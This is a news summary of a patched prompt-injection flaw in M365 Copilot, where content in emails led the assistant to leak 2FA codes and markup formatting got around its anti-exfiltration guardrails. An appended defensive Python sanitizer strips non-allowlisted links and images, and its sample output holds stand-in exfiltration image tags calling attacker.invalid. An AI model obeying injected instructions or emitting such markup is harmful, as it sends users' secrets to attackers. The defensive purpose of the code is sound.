On June 13, 2026, Microsoft released a patch for a critical vulnerability in its M365 Copilot AI platform. Researchers who identified the vulnerability disclosed that their proof-of-concept exploit could access two-factor authentication (2FA) codes and other sensitive information from emails that are accessible to Copilot. The vulnerability arises because AI systems struggle to differentiate between legitimate user instructions and malicious content embedded within third-party material. As a result, Microsoft and other large language model (LLM) providers have implemented complex and temporary measures to mitigate the risks associated with this issue. One such measure prevents Copilot and similar LLMs from submitting web forms or sending emails that could facilitate data exfiltration. However, attackers have found ways to bypass these safeguards by using markup language to format text, which allows sensitive data to be sent to an attacker's server.
Microsoft Addresses Critical Vulnerability in M365 Copilot AI Platform
Microsoft has patched a critical vulnerability in its M365 Copilot AI platform that allowed hackers to access two-factor authentication codes and sensitive data. The vulnerability stems from AI systems' inability to distinguish between user instructions and malicious content, leading to the implementation of complex guardrails that attackers have found ways to circumvent.
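As an added example (not code from Microsoft or from the researchers cited above), the following Python sanitizer illustrates the defensive check implied by the markup-based bypass described above: before model output is rendered, every Markdown link, Markdown image, reference-style link definition and raw HTML image that points outside an allowlist of hosts is rewritten to plain text and recorded, so the rendering client never issues a request to an unknown server. The host allowlist, the sample model output and the `attacker.invalid` domain are constructed for illustration, and the reading of the article's "markup language" as Markdown rendered by the chat client is an assumption.

```python
"""Markdown output sanitizer for LLM responses (added example, constructed data).

Rewrites any link or auto-loading image whose host is not allowlisted into
plain text, returning the list of blocked URLs as a detection signal.
"""
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts the renderer may fetch from or link to.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "outlook.office.com"}

# Inline images ![alt](url) and links [text](url), with optional <url> and "title".
MD_INLINE = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')
# Reference-style definitions at line start: [id]: url
MD_REF_DEF = re.compile(r'^\s*\[([^\]]+)\]:\s*(\S+)', re.MULTILINE)
# Raw HTML <img> tags, which many Markdown renderers pass through unchanged.
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.IGNORECASE)


def url_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """True only for http(s) URLs whose exact host is on the allowlist."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower()
    return host in allowed_hosts


def sanitize_markdown(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (clean_text, blocked_urls).

    Non-allowlisted references keep their visible label but lose the URL, so
    rendering the result makes no request to the referenced host.
    """
    blocked = []

    def inline_repl(m):
        is_image, label, url = m.group(1) == "!", m.group(2), m.group(3)
        if url_allowed(url, allowed_hosts):
            return m.group(0)
        blocked.append(url)
        # Images are fetched automatically on render, so drop them entirely.
        return f"[image removed: {label}]" if is_image else label

    def html_img_repl(m):
        url = m.group(1)
        if url_allowed(url, allowed_hosts):
            return m.group(0)
        blocked.append(url)
        return "[image removed]"

    def ref_def_repl(m):
        url = m.group(2)
        if url_allowed(url, allowed_hosts):
            return m.group(0)
        blocked.append(url)
        return ""  # without its definition, [id] renders as plain text

    clean = MD_INLINE.sub(inline_repl, text)
    clean = HTML_IMG.sub(html_img_repl, clean)
    clean = MD_REF_DEF.sub(ref_def_repl, clean)
    return clean, blocked


# Constructed sample of model output carrying injected markup alongside a
# legitimate tenant link. The query value is a placeholder, not real data.
SAMPLE_OUTPUT = (
    "Here is your summary of today's mail.\n"
    "Latest invoice: [open in SharePoint](https://contoso.sharepoint.com/docs/inv.pdf)\n"
    "![status](https://attacker.invalid/img.png?d=PLACEHOLDER)\n"
    '<img src="https://attacker.invalid/p.gif?x=1">\n'
    "[1]: https://attacker.invalid/ref\n"
)

if __name__ == "__main__":
    clean, blocked = sanitize_markdown(SAMPLE_OUTPUT)
    print(clean)
    for url in blocked:
        print("BLOCKED:", url)
```

The check is an allowlist rather than a denylist: the set of hosts a tenant's assistant legitimately links to is small and knowable, while attacker infrastructure is not. The `blocked` list is worth forwarding to logging as-is, since a mail summary that tries to embed an image from an unfamiliar host is itself a strong indicator of injected content.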
Original headline: Critical Copilot vulnerability allowed hackers to steal 2FA code from users